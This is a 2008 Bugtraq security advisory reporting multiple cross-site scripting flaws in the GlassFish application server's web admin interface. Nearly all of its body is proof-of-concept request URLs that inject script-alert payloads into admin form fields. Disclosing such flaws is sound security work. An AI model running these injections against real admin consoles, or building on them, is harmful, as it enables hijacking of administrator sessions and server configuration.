Muitiple XSS - Glassfish Web Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) )
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Muitiple XSS - Glassfish Web Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs) )
- From: "Eduardo Jorge" <serrano.neves@xxxxxxxxx>
- Date: Sat, 14 Jun 2008 19:42:21 -0300
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to :subject:mime-version:content-type:content-transfer-encoding :content-disposition; bh=jdybLrKR43NFs22SRjf5O8JPGajn+wor5dW2MOjpzCE=; b=XQz/S3gxtqCmG8jfCiXzCq+NChM5CMls+zUzMBRdNH4+S8rQtMD8k87bdTwCfFzjBE aTeC40Lk8NPr4dJ6gVNtVC3JhKCr1ocDmcH4mmZliXpSO4vWe6DDKGE4IMnKglX4U26j MRT/ohbpGFwUhlcgVpmaZRdIWP4yRdJbsLhuY=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type :content-transfer-encoding:content-disposition; b=uI9KqdOjqySPS+AOSOJfISfgR9Un6g53nSrw8GW05DaJN3Kp1oS4h3DSgQCmrI4b2V fdtN9pxPEe8ebS8rv0USU4F7NEuVhaS+d/Lph64qNWdV8DqW53HI9qpDuLIKGyhdHKRo XhbSxCTNvzaXSRCrG4EDoImoesUXBCIQ7aaf0=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
==============================
Muitiple XSS - Glassfish Web Interface (Sun Java System Application
Server 9.1_01 (build b09d-fcs) )
==============================
Author: Eduardo Neves a.k.a _eth0_
Date: 14 june 2008
Site: http://webappsecurity.wordpress.com
==============================
APPLICATION : Glassfish webadmin interface
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)
VENDOR : http://www.sun.com
DOWNLOAD : https://glassfish.dev.java.net/
==============================
IMPACT: XSS, XSRF, etc.
Severity: Low (or not?)
==============================
Descrition:
This vulnerability affect some webpages in the glassfish webadmin interface,
that vulnerability allow user can insert a malicious or a not expected input
data in the input type field.That was found in 10+ input data field in
glassfish.
This is a vulnerable URL:
http://[HOSTNAME]:4848/resourceNode/customResourceNew.jsf?propertyForm%3Aproper
tyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPage
%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Ealer
t%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Aproperty
Sheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27x
ss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3A
propertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%2
7xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%
3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%
3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSecti
onTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=customresou
rcescreate.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_
id276%3Aj_id282&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3Apr
opertyContentPage%3AtopButtons%3AnewButton
http://[HOSTNAME]:4848/resourceNode/externalResourceNew.jsf?propertyForm%3Aprope
rtyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPag
e%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Eale
rt%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3Apropert
ySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27
xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3
ApropertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%
27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet
%3ApropertSectionTextField%3AjndiLookupProp%3AjndiLookup=%3Cscript%3Ealert%28%27
xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3
ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3
C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectio
nTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3ApropertyContentPage%
3AhelpKey=externalresourcescreate.html&propertyForm_hidden=propertyForm_hidden&j
avax.faces.ViewState=j_id289%3Aj_id293&com_sun_webui_util_FocusManager_focusElem
entId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton
http://[HOSTNAME]:4848/resourceNode/jmsDestinationNew.jsf?propertyForm%3Apropert
yContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Aprop
ertSectionTextField%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fs
cript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Anam
e=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyShee
t%3ApropertSectionTextField%3AresTypeProp%3AresType=javax.jms.Topic&propertyForm
%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%2
8%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTex
tField%3AstatusProp%3Acb=true&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3
Acol1St=Description&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol3%3Acol1St=&p
ropertyForm%3AhelpKey=jmsdestinationnew.html%09&propertyForm_hidden=propertyForm
_hidden&javax.faces.ViewState=j_id242%3Aj_id246&com_sun_webui_util_FocusManager_
focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton
http://[HOSTNAME]:4848/resourceNode/jmsConnectionNew.jsf?propertyForm%3Aproperty
ContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Agener
alPropertySheet%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscrip
t%3E&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AresTypeProp%3AresType
=javax.jms.TopicConnectionFactory&propertyForm%3ApropertySheet%3AgeneralProperty
Sheet%3AdescProp%3Acd=%3Cscript%3Ealert%28%27xss2%27%29%3B%3C%2Fscript%3E&proper
tyForm%3ApropertySheet%3AgeneralPropertySheet%3AstatusProp%3Asun_checkbox9=true&
propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AinitSizeProp%3Ads=8&p
ropertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxProp%3Ads2=32&prope
rtyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AresizeProp%3Ads3=2&propert
yForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AidleProp%3Ads=300&propertyFo
rm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxWaitProp%3Ads=60000&property
Form%3ApropertySheet%3ApoolSettingsPropertySheet%3Atransprop%3Atrans=&propertyFo
rm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Password&propertyForm%3AbasicTab
le%3ArowGroup1%3A0%3Acol3%3Acol1St=guest&propertyForm%3AbasicTable%3ArowGroup1%3
A1%3Acol2%3Acol1St=UserName&propertyForm%3AbasicTable%3ArowGroup1%3A1%3Acol3%3Ac
ol1St=guest&propertyForm%3AhelpKey=jmsconnectionnew.html&propertyForm_hidden=pro
pertyForm_hidden&javax.faces.ViewState=j_id226%3Aj_id234&com_sun_webui_util_Focu
sManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%
http://[HOSTNAME]:4848/resourceNode/jdbcResourceNew.jsf?propertyForm%3ApropertyC
ontentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3Aproper
tSectionTextField%3AjndiProp%3Ajnditext=<script>alert('xss');</script>&propertyF
orm%3ApropertySheet%3ApropertSectionTextField%3ApoolNameProp%3APoolName=__CallFl
owPool&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=
<script>alert('xss3');</script>&propertyForm%3ApropertySheet%3ApropertSectionTex
tField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=jdbcresourcenew.
html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id185%3Aj_i
d201&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyConte
ntPage%3AtopButtons%3AnewButton
http://[HOSTNAME]:4848/applications/lifecycleModulesNew.jsf?propertyForm%3Aprope
rtyContentPage%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Aname=<scri
pt>alert('xss');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3Ap
ropertSectionTextField%3AclassNameProp%3Aclassname=<script>alert('xss2');</scrip
t>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%
3ApathProp%3AclassPath=&propertyForm%3ApropertyContentPage%3ApropertySheet%3Apro
pertSectionTextField%3AloadOrderProp%3AloadOrder=<script>alert('xss3');</script>
&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3A
descProp%3Adesc=&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSec
tionTextField%3AstatusProp%3Asun_checkbox8=true&propertyForm%3ApropertyContentPa
ge%3AbottomButtons%3AsaveButton2=++OK++&propertyForm%3AhelpKey=lifecyclemodules.
html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id117%3Aj_i
d125&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyConte
ntPage%3AbottomButtons%3AsaveButton2
http://[HOSTNAME]:4848/resourceNode/jdbcConnectionPoolNew1.jsf?propertyForm%3Apr
opertyContentPage%3AtopButtons%3AnextButton=+Next+&propertyForm%3ApropertyConten
tPage%3ApropertySheet%3AgeneralPropertySheet%3AjndiProp%3Aname=<script>alert('xs
s')</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3AgeneralPropert
ySheet%3AresTypeProp%3AresType=<script>alert('xss2');</script>&propertyForm%3Apr
opertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AdbProp%3Adb=<script>a
lert('xss3');</script>&propertyForm%3AhelpKey=jdbcconnectionpoolnew1.html&proper
tyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id7%3Aj_id34&com_sun_w
ebui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopBu
ttons%3AnextButton
And others =)
--
|_|0|_| Serrano Neves - a.k.a eth0
|_|_|0| http://webappsecurity.wordpress.com
|0|0|0| "Talk is cheap. Show me the code." - Linus Torvalds